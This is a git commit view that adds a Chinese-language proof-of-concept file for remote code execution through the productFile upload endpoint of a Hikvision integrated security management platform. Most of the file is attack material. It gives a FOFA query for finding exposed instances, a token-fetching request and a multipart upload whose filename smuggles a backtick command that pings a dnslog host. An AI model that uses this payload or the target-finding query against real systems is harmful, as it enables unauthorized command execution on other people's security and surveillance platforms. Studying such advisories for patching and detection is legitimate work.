mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-28 11:45:34 +08:00
6.7更新漏洞
This commit is contained in:
47
海康威视综合安防管理平台productFile远程代码执行.md
Normal file
47
海康威视综合安防管理平台productFile远程代码执行.md
Normal file
@@ -0,0 +1,47 @@
|
||||
## 海康威视综合安防管理平台productFile远程代码执行
|
||||
|
||||
海康威视部分综合安防管理平台历史版本由于对上传文件接口校验不足,攻击者可以将恶意文件上传到平台,导致获取服务权限或服务异常。
|
||||
|
||||
## fofa
|
||||
|
||||
```
|
||||
title="综合安防管理平台"
|
||||
```
|
||||
|
||||
## poc
|
||||
|
||||
获取token
|
||||
|
||||
```
|
||||
GET /iac/iasService/v1/register HTTP/1.1
|
||||
Host:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
|
||||
Accept:
|
||||
```
|
||||
|
||||
执行命令 ping
|
||||
|
||||
```
|
||||
POST /svm/api/v1/productFile?type=product&ip=127.0.0.1&agentNo=1 HTTP/1.1
|
||||
Host:
|
||||
Token: SElLIElnVTBzNVd6eWlibVB4M046dUE0SlBBbGJTWGNMUnk5aWg4dkJXL2RjeEdqKys4aTd0cHBMM09INytVZz0=
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: multipart/form-data;boundary =---------------------------142851345723692939351758052805
|
||||
Content-Length: 346
|
||||
|
||||
-----------------------------142851345723692939351758052805
|
||||
Content-Disposition: form-data; name="file"; filename="`ping xxx.dnslog.cn`.zip"
|
||||
Content-Type: application/zip
|
||||
|
||||
123
|
||||
-----------------------------142851345723692939351758052805--
|
||||
```
|
||||
|
||||
|
||||
|
||||
## 漏洞来源
|
||||
|
||||
- https://mp.weixin.qq.com/s/8mrt1KLLBQbhVorI4TwWvg
|
||||
Reference in New Issue
Block a user